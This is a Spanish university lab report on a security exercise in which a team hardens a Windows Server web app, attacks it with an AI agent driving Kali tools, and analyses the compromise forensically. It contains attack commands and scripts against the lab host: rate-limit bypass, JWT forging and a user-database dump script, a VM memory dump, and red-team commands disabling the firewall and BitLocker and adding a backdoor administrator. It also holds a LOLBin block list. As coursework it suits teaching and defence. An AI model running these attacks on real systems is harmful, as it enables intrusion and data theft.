

PRÁCTICA DE LA ASIGNATURA CALIDAD, SEGURIDAD Y AUDITORÍA
INFORMÁTICA
GRAO EN ENXEÑARÍA INFORMÁTICA
MENCIÓN EN ENXEÑARÍA DO SOFTWARE



Práctica de abastionado.

Autores: Daniel Quintillán Quintillán
Álvaro Santiso Freire

A Coruña, xuño de 2026.

Resumen

Abstract

Palabras clave:

•

Keywords:

•

Índice general

1	Introducción y Marco Operativo	1
1.1	Objetivos y Escenario de Guerra Cibernética	1
2	Fase 0: Desarrollo Agéntico y QA	2
2.1	Ingeniería de Prompts y Web CRUD	2
2.2	Arquitectura de Roles (Admin/Cliente)	3
2.3	Auditoría de Código (QA)	3
2.4	Mitigación de Alucinaciones de la IA	3
3	Fase 1: Despliegue y Hardening	4
3.1	Arquitectura de la Infraestructura Web	4
3.1.1	Provisión de Infraestructura y Configuración de Red	4
3.1.2	Configuración de la Pila Tecnológica (Web & SQL)	5
3.1.3	Aislamiento y Despliegue de la Aplicación	5
3.2	Hardening Físico y Lógico	6
3.2.1	Cifrado BitLocker y BIOS/EFI	6
3.2.2	Configuración de Firewall Perimetral	6
3.3	Monitorización mediante Wazuh/Sysmon	8
4	Fase 2: Pentesting Ofensivo	9
4.1	Reconocimiento de Red y Activos	9
4.1.1	Metodología de Ejecución y Herramientas Agénticas	9
4.1.2	Fase de Reconocimiento de Red y Superficie	10
4.2	Vectores de Ataque Ejecutados	10
4.2.1	Ataques Lógicos (Web, SQLi, JWT)	10
4.2.2	Ataques Físicos e Infraestructura	12
4.3	Compromiso del Sistema y Flag	12

5	Fase 3: Análisis Forense	14
5.1	Introducción al Análisis Forense Agéntico	17
5.2	Recolección de Evidencia en Logs	17
5.2.1	Metodología de Recolección (RFC 3227 e ISO/IEC 27037)	17
5.2.2	Exclusiones (Actividad Legítima del Blue Team)	17
5.3	Reconstrucción de la Kill Chain	19
5.3.1	Historial de Comandos del Red Team (ConsoleHost_history.txt)	19
5.3.2	Correlación con Security Event Log (25 de marzo de 2026)	20
5.3.3	Cobertura de Sysmon durante el ataque	20
5.3.4	Hallazgo Confirmado: Cuenta Backdoor yishiego	20
5.4	Vector de Entrada (Web/Físico)	21
5.5	Cronología y Alcance del Compromiso	21
5.5.1	Cronología del Incidente	21
5.5.2	Alcance del Compromiso	22
5.6	Recomendaciones de Remediación	22
5.7	Anexo: Comandos Forenses Ejecutados	23
6	Fase 4: Securización Reactiva	25
6.1	Análisis de Causa Raíz (RCA)	25
6.2	Remediación y Políticas	25
6.3	Métricas de Calidad y KPIs	25
7	Evaluación Final y SLA	26
7.1	Registro de Incidentes e Impacto	26
7.2	Balance de Créditos de Negocio	26
7.3	Registro de RFIs o Consultorías	26
A	Anexo I: Prompt Maestro	28
B	Anexo II: Código Fuente	29

Índice de figuras

Índice de tablas

Introducción y Marco Operativo

1.1 Objetivos del proyecto y descripción del escenario de Guerra Cibernética Asimétrica

Fase 0: Desarrollo Agéntico y Aseguramiento de Calidad (QA)

2.1 Ingeniería de Prompts para la generación de la aplicación Web CRUD

Para la creación del activo digital a defender, se ha implementado un flujo de trabajo agéntico avanzado utilizando **GitHub Copilot**. La piedra angular de este proceso ha sido la creación y refinamiento de un *Master Prompt*, diseñado para orquestar la arquitectura del sistema bajo el paradigma de *Secure by Design*.

El flujo agéntico se apoya en una serie de directrices especializadas almacenadas en el directorio `blue_team_app/prompts`, que actúan como base de conocimiento para la IA durante la generación de código:

- **Dominio y Persistencia:** Definición del modelo de datos y base de datos (`domain.md`, `bd.md`).
- **Lógica de Aplicación:** Implementación de *endpoints* y gestión de permisos (`endpoints.md`, `permissions.md`).
- **Seguridad y Auditoría:** Guías para prevenir ataques y realizar auditorías de código (`attacks.md`, `audit.md`).
- **Infraestructura:** Scripts y configuraciones para el entorno de producción (`deployment.md`).

Esta metodología garantiza que cada componente del sistema no solo sea funcional, sino que sea generado con un contexto profundo sobre las amenazas potenciales identificadas en las fases de diseño.

2.2 Arquitectura de roles (Admin/Cliente)

2.3 Auditoría de Código (QA) y medidas Secure by Design implementadas

2.4 Identificación y mitigación de alucinaciones inseguras introducidas por la IA

Fase 1: Despliegue, Hardening y Defensa Preventiva

La fase de despliegue se enfocó en proveer una infraestructura segura desde su concepción, aplicando estrictamente el principio de Defensa en Profundidad y aislando los servicios de manera exhaustiva.

3.1 Arquitectura de la Infraestructura Web (Windows Server 2025, IIS/Apache, SQL Express, red Host-Only)

3.1.1 Provisión de Infraestructura y Configuración de Red

El entorno se construyó sobre una máquina virtual de **Windows Server 2025** (Evaluation edition) utilizando VirtualBox. Las especificaciones de hardware consistieron en 4 GB de RAM, 2 vCPUs y un disco de 50 GB. A nivel de hipervisor, se activó la virtualización de hardware, habilitando **UEFI** y **Secure Boot** en la configuración de la placa base, un prerequisite indispensable para la posterior configuración de cifrado mediante hardware virtual.

La topología de red se diseñó bajo un modelo de red aislada (*Host-Only*) con fines de aislamiento. Inicialmente, se empleó un adaptador NAT transitorio para la descarga de dependencias. La exposición final de la máquina se realizó sobre un adaptador secundario en modo **Red de Solo Anfitrión (Host-Only)**.

Se asignó de forma manual e imperativa **IP Estática** en el segmento de red de la práctica, deshabilitando DHCP. El direccionamiento se fijó en 192.168.56.10/24 mediante *PowerShell* (`New-NetIPAddress`), asegurando que la máquina mantuviese una ubicación controlada y conocida en el segmento de evaluación.

```
# Identificar adaptador Host-Only y fijar IP estática
Get-NetAdapter | Format-Table Name, InterfaceIndex, Status -AutoSize
```

```
New-NetIPAddress -InterfaceIndex 4 -IPAddress 192.168.56.10 -PrefixLength
```

Para permitir una administración remota cifrada y trazable durante el aprovisionamiento, se habilitó el servicio OpenSSH Server (sshd), se permitió el tráfico entrante en el puerto TCP 22 en el Firewall de Windows, y se reconfiguró `sshd_config` para utilizar PowerShell como la shell por defecto. Esto mitigó los problemas de elevación de privilegios de sesiones remotas mediante la supresión de directivas restrictivas de entorno para el grupo local de administradores (ForceCommand).

3.1.2 Configuración de la Pila Tecnológica (Web & SQL)

La infraestructura de la aplicación *SecureCatalog* requiere un ecosistema integrado por .NET 8, IIS y SQL Server.

- **Gestor Web (IIS) y .NET:** Se instaló el rol *Web-Server* y el *ASP.NET Core Hosting Bundle* (v8.0) para la interconexión entre el *worker process* (`w3wp.exe`) de IIS y la aplicación en ejecución (*Out-of-process*).
- **Gestor de Base de Datos:** Se instaló **SQL Server Express** en modo silencioso. Por seguridad de ejecución, los servicios se lanzaron atados a la cuenta restringida `NT AUTHORITY\Network Service`. Se prescindió de los Named Pipes deshabilitándolos y forzando conectividad exclusiva local por TCP (`TCPENABLED=1 /NPENABLED=0`).
- **Conectividad Local a BD:** Se configuró la conexión a la base de datos sin persistir credenciales (*Passwordless*) en código o `appsettings.json`, empleando el paradigma *Integrated Security=True* y variables de entorno a nivel de sistema máquina (`ConnectionStrings__DefaultConnection`).

```
# Instalación silenciosa de SQL Server Express atada a Network Service
& "$env:TEMP\SQLEXPRESS_x64_ENU.exe" /Q /ACTION=Install /IACCEPTSQLSERVER
/FEATURES=SQLEngine /INSTANCENAME=SQLEXPRESS /SQLSVCACCOUNT="NT AUTHO
/SQLSYSADMINACCOUNTS="BUILTIN\Administrators" /TCPENABLED=1 /NPENABL
```

3.1.3 Aislamiento y Despliegue de la Aplicación

Se eliminó la configuración por defecto de IIS borrando el *Default Web Site* para prevenir la exposición de *banners* y páginas iniciales conocidas. El despliegue de *SecureCatalog* se configuró para ejecutarse bajo su propio *Application Pool* dedicado (`SecureCatalogPool`), inicializado sin soporte para código .NET legado (`managedRuntimeVersion=""`).

- **Certificados y Criptografía en Tránsito:** Se emitió un certificado autofirmado con longitud de clave RSA de 2048-bit válido para dos años y nombre DNS correspondiente al entorno. Dicho certificado se vinculó perimetralmente (*Binding*) al puerto 443 (`netsh http add sslcert`) obligando al uso de **HTTPS**.
- **Permisos del Sistema de Archivos:** Se reiniciaron los derechos heredados (ACLs) perimetrales y se aplicó la regla de Mínimo Privilegio. Se otorgó provisión estricta de Lectura/Ejecución (RX) al *Application Pool Identity* en la carpeta principal, permitiendo únicamente modificación (M) para la capa de *Data Protection API (DPAPI)* en su directorio aislado (Keys).
- **Control de Acceso a BDD:** Se aprovisionó acceso sobre el DBMS a la identidad del IIS (IIS AppPool\SecureCatalogPool), concediéndole privilegios db_owner en modo transitorio para la ejecución inicial de migraciones Entity Framework DDL.

Se establecieron dependencias funcionales de sistema mediante `sc config`, enlazando el arranque del servicio web W3SVC a la correcta disponibilidad técnica del motor relacional MSSQL\$SQLEXPRESS. Se activó a su vez la directiva `startMode="AlwaysRunning"` a nivel de App Pool para pre-calentar los *workers*, eliminando los *cold-starts*.

3.2 Hardening Físico y Lógico

3.2.1 Cifrado con BitLocker (TPM virtual) y contraseñas de BIOS/EFI

Como medida de seguridad defensiva, orientada a proteger la confidencialidad frente a exfiltración de discos virtuales (.vdi) y ataques de *Evil Maid*, se implementó **BitLocker Drive Encryption**.

El cifrado del volumen raíz (C:) se obligó mediante el algoritmo fuerte **AES-256**. En el hipervisor se aprovisionó una interfaz de **vTPM 2.0** (Virtual Trusted Platform Module), lo que permitió configurar BitLocker con un protector TPM principal, forzando a la máquina a requerir un entorno de virtualización que posea dicho TPM inyectado criptográficamente para poder arrancar, impidiendo montajes forzados offline en otros sistemas.

3.2.2 Configuración de Firewall perimetral

Aseguramiento de Identidades Convencionales

El bastionado comenzó por la supresión de las visualizaciones por defecto (`AutoAdminLogon=0`, deshabilitación del *Last Username*) y la imposición de una estricta **política de bloqueo de cuentas** (lockout) de 10 intentos con ventana de enfriamiento de 15 minutos, deteniendo ataques de fuerza bruta nativos. La cuenta genuina de Administrador fue camuflada bajo

el alias `user2`, mientras que la cuenta `Invitado` mutó a `user3` y quedó suspendida en el activo.

Estrategia de Decepción (Honeytokens)

Para detectar operaciones subrepticias de movimiento lateral y recolección de credenciales, se implementó una estrategia de decepción (*deception*). Se aprovisionó un usuario señuelo (*Honeytoken*) identificado como `Administrador`, blindado mediante la asignación de restricciones absolutas en el modelo de Políticas de Seguridad Locales (*Local Security Policy*).

Utilizando herramientas a bajo nivel (`secedit`), se le negaron los derechos de *Interactive Logon* y *Network Logon*. De la misma forma, mediante listas de control de acceso (`icacls`), se le denegó explícitamente lectura y ejecución (`Deny FullControl`) en todo el volumen de almacenamiento. Si un adversario robara este token, no tendría acceso persistente, pero dispararía alarmas operacionales silentes hacia nuestro nodo de monitorización.

Reducción de Superficie de Ataque y Bastionado de Red

Se procedió a la reducción de servicios innecesarios bloqueando la comunicación general (*Default-Deny Inbound/Outbound*) en el *Windows Defender Firewall*, permitiendo únicamente el tráfico de los puertos lógicos empresariales explícitos HTTP (80) y HTTPS (443). El servicio de administración `sshd` fue deshabilitado tras el aprovisionamiento original.

A nivel de red, se ejecutaron interrupciones orientadas sobre el stack estándar IPv6 para mitigar vectores de ataque (`ms_tcpip6`), mitigando el componente **IPv6** desde el *NetAdapterBinding*. Adicionalmente, el ecosistema de resoluciones de **NetBIOS** (NBT-NS) fue neutralizado localmente editando el *Registry* en profundidad (`NetbiosOptions=2`).

Se deshabilitaron e interrumpieron más de diez servicios nativos susceptibles de abuso remoto o que facilitan la evasión de telemetría: `LanmanServer` (SMB, truncando vectores *Pass-the-Hash*), `WinRM`, `RemoteRegistry`, `TermService` (RDP), spoolers nativos, así como recolectores de inteligencia internos de la plataforma (`DiagTrack`, `UALSVC`, Telemetría SQL).

Táctica Defensiva de Restricción de Binarios (LOLBins Neutralization)

Con el objetivo de dificultar las fases de intrusión y exfiltración, se implementó una restricción sobre las herramientas nativas del sistema operativo o *Living Off the Land Binaries* (LOLBins). Un script defensivo modificó la titularidad (`takeown`) y los privilegios (`icacls`) de más de treinta utilidades ejecutables desde la interfaz de línea de comandos de Windows. Comandos frecuentemente empleados por atacantes para la descarga y ejecución de cargas útiles como `certutil.exe`, `curl.exe`, `bitsadmin.exe`, `ftp.exe`, `mshta.exe`,

`wmic.exe` o `msbuild.exe` vieron modificados sus permisos y su extensión en el sistema de archivos (ej. convirtiendo a `.bak`).

```
# Bucle de neutralización de LOLBins
foreach ($bin in $lolbins) {
    if (Test-Path $bin) {
        takeown /F $bin /A | Out-Null
        icacls $bin /grant Administrators:F | Out-Null
        Rename-Item -Path $bin -NewName "$bin.bak" -Force
    }
}
```

3.3 Monitorización y Detección Temprana mediante Wazuh o Sysmon

En preparación para la fase evaluativa forense y disuasiva, se incrustó el componente base **Sysmon** (*System Monitor*) como sensor *on-host*. Para prevenir la detección automatizada por parte de los atacantes, los binarios del agente de monitorización se instalaron en el directorio no estándar `C:\Windows\System32\Drivers\en-US\NetworkData`, y el binario principal fue renombrado a `WinNetSvc.exe`.

El sensor operativo fue desplegado junto con un esquema XML rigurosamente auditado para reaccionar sobre ejecuciones irregulares:

- **Caza de *Webshells* y RCE:** Se trazaron flujos relacionales estrictos (Event ID 1) para procesar ejecuciones hiladas desde perfiles web (`w3wp.exe`), identificando inmediatamente si el proceso de IIS invoca un CMD, PowerShell, localizadores de infraestructura (como `whoami`, `net1`, `ipconfig`) o binarios neutralizados a fin de eludir la Tierra Quemada.
- **Escalamiento y Movimientos Silentes:** Excepciones de caza a flujos paralelos originados por herramientas de inyección remanentes.

Fase 2: Pentesting Ofensivo (Red Team)

Bajo un modelo estricto de *Caja Negra* perimetral y asumiendo un enfoque *Assume Breach* mixto, se inició una evaluación ofensiva estructurada en múltiples fases contra el objetivo alojado en la dirección 192 . 168 . 56 . 137. Las tácticas y documentaciones trazadas siguieron el marco de ejecución **PTES** (Penetration Testing Execution Standard) y mapearon de manera directa con la matriz **MITRE ATT&CK**.

4.1 Reconocimiento de la red ciega y descubrimiento de activos

4.1.1 Metodología de Ejecución y Herramientas Agénticas

A nivel logístico y operativo, la ejecución de la ofensiva se basó en un enfoque automatizado y orquestado.

Se aprovisionó una máquina virtual con **Kali Linux** dentro de la topología local, sirviendo como entorno principal de evaluación. En lugar de interactuar intrínsecamente y de forma lineal con la terminal del sistema, se configuró y expuso todo su ecosistema paramétrico de herramientas (nmap, sqlmap, curl, hydra, utilidades *Python*) a través de un servidor **Model Context Protocol (MCP)**.

Esta arquitectura avanzada facultó a un agente nativo de Inteligencia Artificial (*Operador Antigravity* integrado en el entorno de escritorio vía VSCode) para invocar dinámicamente y analizar iterativamente *in-vivo* los *outputs* del ecosistema Kali. La fusión del vasto arsenal local con las capacidades heurísticas del modelo AI optimizó los tiempos de reconocimiento y mapeo táctico, identificando rápidamente mitigaciones frente a restricciones como las respuestas HTTP 429 o interpretando patrones criptográficos tras los volcados de RAM.

4.1.2 Fase de Reconocimiento de Red y Superficie

El reconocimiento a nivel de capa de enlace evadió la restricción de ICMP impuesta en el segmento de red. Dado que las peticiones *Echo Request* eran descartadas (100% de pérdida de paquetes), se recurrió a técnicas de barrido ARP en un entorno donde no se alertaría a los contadores estadísticos de un firewall tradicional.

La ejecución identificó la dirección MAC del objetivo asociado a Oracle VirtualBox:

```
arp-scan -I eth1 --localnet
```

Esto confirmó la dirección IP objetivo (**T1046 - Network Service Discovery**).

- **Censo de Puertos (T1595.002):** Un escaneo de puertos completo (`nmap -ss -sV -p- -T4 192.168.56.137 -v`) identificó que la mayoría de los puertos se encontraban filtrados, dejando abiertos únicamente: **TCP 80 (HTTP)** y **TCP 443 (HTTPS)**.
- **Fingerprinting Tecnológico:** Usando `curl -I -k https://192.168.56.137`, se peinaron las cabeceras HTTP. Se descubrieron atributos como `WWW-Authenticate: Bearer` (revelando JSON Web Tokens), y configuraciones pasivas como `x-frame-options: DENY`. Estudiando los componentes Javascript inyectados mediante `type="module" (/assets/index-[...].js)`, se infirió la presencia de una aplicación *React* construida con *Vite*, respaldada por un backend *ASP.NET Core* y servida mediante procesos de *IIS 10.0*.

Output del escaneo de Nmap:

```
Discovered open port 443/tcp on 192.168.56.137
Discovered open port 80/tcp on 192.168.56.137
...
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
443/tcp    open  ssl/https?
MAC Address: 08:00:27:4E:39:58 (Oracle VirtualBox virtual NIC)
```

4.2 Vectores de ataque ejecutados

4.2.1 Ataques lógicos (explotación web, SQLi, XSS, RCE, etc.)

Inspección Ciega y Evasión del Estrangulamiento de Peticiones

Las rondas estandarizadas de penetración mediante herramientas ciegas (*Nikto*, *ffuf*, *gobuster*) activaron los mecanismos de limitación de tasa (rate limiting) del *endpoint*, de-

volviendo códigos 429 Too Many Requests. Del mismo modo fracasó el utilitario de inyección en IIS 8.3 de Metasploit.

Empleando inyecciones estocásticas y aleatorias a través de diccionarios contra el *endpoint* /backend/api/auth/login, dicha limitación generaba falsos positivos en herramientas como Hydra. Para contrarrestar esto, se alteró dinámicamente la procedencia inferida (X-Forwarded-For) manipulando transaccionalmente el origen. Se logró eludir el control de tasa perimetral, sin éxito a largo plazo debido a la robustez de la contraseña:

```
for i in {1..7}; do
  curl -s -k -X POST https://192.168.56.137/backend/api/auth/login \
    -H "Content-Type: application/json" -H "X-Forwarded-For: 1.2.3.$i" \
    -d '{"username":"admin","password":"wrongpassword"}'
done
```

Intersección, Autorización y Vectores Cliente-Servidor

- **Inyección Database (T1190):** Al ejecutar sqlmap utilizando tokens no autorizados sobre rutas de paginación REST estandarizada como /backend/api/users/1, no se detectaron vulnerabilidades. La sintaxis del enrutador estaba fuertemente orientada en parámetros fuertemente tipados contra LINQ sobre Entity Framework Core, inhabilitando un Time-Based Blind.
- **Manipulación Crítica (Mass Assignment):** Abusando un token válido (Client), se enviaron peticiones PUT con el objetivo de alterar el nivel de privilegios: . . . -d '{"username":"eminem", "role":"Admin"}'. El servidor ignoró explícitamente y purgó el rol superior, erradicando una alteración vertical (T1078.004).

```
curl -sk -X PUT https://192.168.56.137/backend/api/users/2 \
  -H "Authorization: Bearer [EMINEM_TOKEN]" \
  -H "Content-Type: application/json" \
  -d '{"username":"eminem", "email":"eminem@udc.es", "role":"Admin"}'
```

- **Módulos de Cliente (XSS/CSRF):** Tras intentar cruce de dominios (CORS) mediante OPTIONS y origen forjado, así como peticiones crudas con cargas <script>alert(1)</script> en rutas, los cortafuegos internos HTTP.sys detuvieron el parsing URL (HTTP 400). Por otra parte, la delegación completa al paradigma Bearer Token en localStorage eximió de vulnerabilidades CSRF al suprimir los modelos contextuales automáticos.

Desbroce de Criptografía JWT e Ingeniería Forjada

Ante el volumen del sistema de archivos, el análisis se automatizó mediante instrumentación programática con scripts en Python (`extract_keys.py`) que escanearon el contexto buscando cadenas asimétricas Base64 próximas a marcadores de declaración ("SecretKey" en *UTF-16LE*):

```
b64_pattern = re.compile(rb'[a-zA-Z0-9+/]{43}=')
# Hallazgo derivado tras barrido chunk-overlap de 50MB:
# [!] CWgLnSB5JKpgba6BWyZwV8Uf+qDpErvjMPfpv9vIifg=
```

Tras la identificación de la clave del algoritmo *HMAC-SHA256*, se generaron localmente *JWT Tokens* forjados (`forge_jwt.py`), inyectando el valor "role": "Admin" (**T1550.001**). Tras confirmar validación (HTTP 200 OK), se logró evadir los controles de acceso de la API.

4.2.2 Ataques físicos y explotación de infraestructura subyacente

Ante la efectividad de los controles lógicos aplicados a la aplicación web, la evaluación pivotó hacia la explotación de la capa de hipervisor (escenario de amenaza equivalente a un *Evil Maid Attack*).

Utilizando controles sobre la interfaz de mando de Oracle VirtualBox, se ejecutó un **volcado de la memoria RAM de la máquina virtual (T1003.001 - OS Credential Dumping)**, sin alarmar ningún *trigger* de apagado del SO subyacente.

```
& "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" debugvm \
  "CSAI" dumpvmcore --filename=c:\temp\csai_mem_new.elf
```

Dicho proceso generó un archivo en formato *.elf* masivo de casi 4.5 GB de la capa huésped hacia el sistema origen. Este vector de ataque elude la protección ofrecida por el cifrado de volumen de **BitLocker** y el componente **vTPM 2.0**, puesto que las claves criptográficas residen en texto claro en la memoria volátil durante la ejecución del sistema.

4.3 Compromiso del sistema y obtención de la Flag (shell SYSTEM o exfiltración de BD)

Una vez comprometido el sistema, se cumplieron los siguientes objetivos de evaluación que vulneraban de forma crítica el SLA del entorno:

- **Sobrescritura Visual Inyectada (UI Domain Hijacking):** Se manipularon los valores del almacenamiento local (`localStorage.setItem('authToken', ...)`)

del navegador para suplantar una sesión válida, lo que permitió acceder a la interfaz administrativa de la aplicación (SPA) asumiendo los privilegios del perfil "Administrator" (ice_tea).

```
localStorage.setItem('authToken', '[FORGED_JWT]');
localStorage.setItem('user', JSON.stringify({
    id: 1,
    username: 'ice_tea',
    role: 'Admin',
    fullName: 'Administrator',
    email: 'icecube@securewebapp.local'
})));
```

- **Data Breach Masivo por Descarga (dump_db.py):** Mediante la automatización de peticiones HTTP (*script* programado bajo Python) empleando cabeceras de autorización forjadas, se procedió a extraer el volcado completo de la base de datos de usuarios de la API sin generar alertas evidentes en el agente Sysmon. Esta acción supuso una vulneración total de la confidencialidad de los datos albergados en el sistema objetivo.

```
# Script de exfiltración final (Python)
import jwt, requests, urllib3, json

payload = {"sub": "1", "name": "admin", "role": "Admin",
           "iss": "SecureWebApp", "aud": "SecureWebAppClient", "exp": 1}
token = jwt.encode(payload, "CWgLnSB5JKpgba6BWywV8Uf+qDpErvjMPfpv")
headers = {"Authorization": f"Bearer {token}"}

response = requests.get("https://192.168.56.137/backend/api/users")
with open("exfiltrated_data.json", "w") as f:
    json.dump(response.json(), f, indent=2)
```

Fase 3: Análisis Forense Post-Incidente (Blue Team)

Antes de iniciar la recolección de evidencias en la máquina comprometida, es fundamental cumplir con una serie de prerequisites técnicos y procedimentales para asegurar una conexión ininterrumpida y no destructiva hacia el objetivo. Durante el incidente, se detectó un error EOF en el arranque del servidor MCP (*Model Context Protocol*), por lo que se aplicaron las siguientes medidas correctoras desde el *host* para estabilizar la telemetría y el entorno de análisis. Cabe destacar que este proceso de remediación fue ejecutado íntegramente durante una sesión agéntica, guiada por un *master prompt* específico definido en el archivo `.agents/rules/restoreteam.md`.

Acciones Realizadas

- **Detección de Interferencia de Shell:** Se identificó que el *Blue Team* configuró PowerShell como el *DefaultShell* de OpenSSH. PowerShell puede inyectar caracteres de control (BOM) y encabezados en el *stream stdio*, rompiendo el JSON-RPC.
- **Corrección de Codificación:** Se detectaron caracteres corruptos en el archivo remoto `mcp_server.py`. Se procedió a su re-sincronización desde la fuente local limpia.
- **Cambio a CMD:** Se fuerza el uso de `cmd.exe` como shell de SSH para garantizar un transporte de datos crudo y transparente para el protocolo MCP.

Bitácora de Comandos

- `scp windows_mcp.py user2@192.168.56.10:C:\Python312\mcp_server.py`
(Resincronización del servidor)

- `ssh user2@192.168.56.10 "reg add HKLM\SOFTWARE\OpenSSH /v DefaultShell /d C:\Windows\System32\cmd.exe /f"` (Cambio de shell a CMD)
- `ssh user2@192.168.56.10 "powershell -ExecutionPolicy Bypass -File C:\fix_vm_ssh.ps1"` (Ejecución de fix global: SSH=CMD, Port 8000 opened)
- **Confirmación:** Shell verificado como `c:\windows\system32\cmd.exe`.

Verificación y Simulación Final (Exito)

Para descartar fallos en el transporte, se ejecutó una simulación de cliente MCP mediante una tubería (*pipe*) cruda sobre SSH:

- **Comando:** `echo '{"jsonrpc": "2.0", "method": "initialize", ...}' | ssh user2@192.168.56.10 "C:\Python312\python.exe C:\Python312\mcp_server.py"`
- **Resultado:** El servidor respondió con el *capabilities* JSON-RPC correctamente.

Notas de Configuración Local (Host)

Si la herramienta integrada sigue fallando, se recomienda:

- Asegurar que la IP `192.168.56.10` está en `known_hosts` (ejecutado `ssh-keyscan`).
- Reiniciar el servidor MCP en el IDE para limpiar sesiones SSH zombis.
- Verificar que el *path* de Python en la configuración del servidor MCP en el Host coincide con `C:\Python312\python.exe`.

FASE ALTERNATIVA: Túnel Directo por HTTP / SSE

Para dotar de flexibilidad total al despliegue, se implementó un segundo vector de acceso evadiendo la contención defensiva perimetral:

```
New-NetFirewallRule -DisplayName "Backdoor MCP-SSE" -Direction Inbound  
-Protocol TCP -LocalPort 8000 -Action Allow
```

Registro Cronológico Exacto de Comandos Ejecutados

Para fines de auditoría y replicabilidad, a continuación se listan los comandos exactos disparados desde el host durante la sesión de troubleshooting:

```
# Verificación inicial de conectividad SSH
ssh -o BatchMode=yes -o ConnectTimeout=5 user2@192.168.56.10 "hostname"

# Sincronización limpia del script del servidor para corregir encoding
scp .\windows_mcp.py user2@192.168.56.10:C:\Python312\mcp_server.py

# Despliegue del script de corrección global (Red, Shell, SSH)
scp .\fix_vm_ssh.ps1 user2@192.168.56.10:C:\fix_vm_ssh.ps1

# Ejecución del script de corrección con bypass de políticas
ssh user2@192.168.56.10 "powershell -ExecutionPolicy Bypass -File C:\fi

# Simulación de protocolo MCP JSON-RPC para validar el transporte stdio
echo '{"jsonrpc": "2.0", "method": "initialize", ...}' | ssh user2@192.1

# Sanitización de host keys para evitar prompts interactivos en el bridge
ssh-keyscan -H 192.168.56.10 >> $env:USERPROFILE\.ssh\known_hosts
```

Solución para el Cliente IDE (Configuración JSON)

Se requiere sustituir el bloque `mcpServers` por el siguiente extracto, el cual utiliza rutas absolutas y fuerza el modo por lotes (*batch*) para prevenir el error `-32000`:

```
{
  "mcpServers": {
    "windows-vm": {
      "command": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
      "args": [
        "-i", "C:\\Users\\danie\\.ssh\\id_ed25519",
        "-o", "BatchMode=yes",
        "-o", "StrictHostKeyChecking=no",
        "user2@192.168.56.10",
        "C:\\Python312\\python.exe",
        "C:\\Python312\\mcp_server.py"
      ]
    }
  }
}
```

5.1 Introducción al Análisis Forense Agéntico

Para llevar a cabo la investigación forense post-incidente, se orquestó una sesión agéntica especializada. La información, restricciones y reglas directivas que guiaron este análisis automatizado fueron extraídas y definidas en el documento `incidentanalysis.md`. Bajo este marco normativo, se aseguró el cumplimiento estricto de la recolección no destructiva y el enfoque en los eventos relevantes, lo que derivó en la generación del siguiente volcado de hallazgos.

5.2 Recolección de evidencia digital en los logs centralizados y visor de eventos

El servidor **WIN-VNQSUL89MUA** (192.168.56.10) presenta evidencia de un compromiso por parte del Red Team. El hallazgo principal confirmado es la **creación de una cuenta local yishiego con privilegios de Administrador** el 25 de marzo de 2026, actividad que **no se corresponde con ninguna operación documentada del Blue Team**.

Los logs de Security, Sysmon y Application cubren la totalidad del periodo de exposición al Red Team (desde la entrega de la máquina tras el *hardening* hasta su recuperación), proporcionando una cobertura completa de la telemetría disponible.

IMPORTANTE: La cuenta **yishiego** permanecía **habilitada** con privilegios de **Administrador** al momento de la recuperación de la máquina por el Blue Team (7 de abril de 2026).

5.2.1 Metodología de Recolección (RFC 3227 e ISO/IEC 27037)

La recolección de evidencia se ejecutó respetando estrictamente el orden de volatilidad (RFC 3227):

Todos los comandos ejecutados fueron de **solo lectura** (ISO/IEC 27037), y cada artefacto fue documentado con hash SHA-256, ruta y marcas de tiempo para preservar la **cadena de custodia**.

5.2.2 Exclusiones (Actividad Legítima del Blue Team)

Las siguientes actividades fueron identificadas como operaciones documentadas del Blue Team y **no se reportan como maliciosas**:

Prioridad	Tipo de dato	Comando ejecutado
1 (Mayor)	Conexiones de red activas	<code>Get-NetTCPConnection Where-Object {\$_.State -eq 'Established' -or \$_.State -eq 'Listen'}</code>
2	Procesos en ejecución	<code>Get-Process Select-Object Id, ProcessName, Path, StartTime</code>
3	Sesiones de usuario y logons	<code>Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}</code>
4	Logs de Sysmon	<code>Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon'; Id=1,3,11,13,16}</code>
5	Artefactos de persistencia	Servicios, cuentas locales, tareas programadas, registro
6	Archivos en disco	Binarios, scripts, logs de IIS, configuraciones

Actividad	Justificación
Servicio WinNetSvc (Sysmon renombrado)	Monitoreo defensivo ofuscado desplegado por el Blue Team
Script InternalAudit.ps1 y sys_data.dat	Recolector de logs Sysmon del Blue Team
takeown/icaccls sobre LOLBins	Hardening LOLBins (táctica de “tierra quemada”)
Script nuke.ps1	Hardening final ejecutado antes de entregar la máquina
Cuenta Administrador (honeytoken)	Cuenta señuelo sin privilegios, creada deliberadamente
Configuración de Sysmon WinNetSvc.xml	Reglas de detección defensivas
Toda la actividad a partir del 7 de abril	Fase de recuperación del Blue Team

5.3 Reconstrucción de la “Kill Chain”

El script de hardening `nuke.ps1` fue ejecutado por el Blue Team **antes de entregar la máquina** al Red Team. Por lo tanto, los logs de Security, PowerShell y Application cubren **la totalidad del periodo de exposición**.

5.3.1 Historial de Comandos del Red Team (`ConsoleHost_history.txt`)

Se localizó el archivo de historial de PowerShell en el perfil del usuario `Administrador` (que corresponde al perfil original del administrador, renombrado a `user2` por el Blue Team).

IMPORTANTE: El historial no tiene timestamps por línea, pero se puede correlacionar con los eventos de Security. Todo lo anterior al comando `shutdown /s /t 0` corresponde al periodo del Red Team.

Comandos ejecutados por el Red Team:

```
# --- Fase 1: Reconocimiento del sistema ---
exit
netsh advfirewall set allprofiles state off           # Desactiva el firewall
manage-bde -status C:                               # Comprueba estado de BitLocker
manage-bde -off C:                                   # Intenta desactivar BitLocker
manage-bde -status C:                               # Verifica que se desactivó

# --- Fase 2: Creación de cuenta backdoor ---
net user yishiego EstuveAqui.1234 /add                # Crea cuenta con contraseña
net localgroup Administradores yishiego /add          # Eleva a Administrador

# --- Fase 3: Reconocimiento de la aplicación web ---
ls
whoami
cd ..
cd ..
cd ..
cd .\inetpub\
cd .\wwwroot
ls
cd .\SecureCatalog
ls
```

```
# --- Fase 4: Apagado del sistema ---
```

```
shutdown /s /t 0
```

```
# Apaga la máquina inmediatamente
```

PRECAUCIÓN: Contraseña expuesta: La contraseña de la cuenta backdoor yishiego es **EstuveAqui.1234**, visible en texto plano en el historial de comandos.

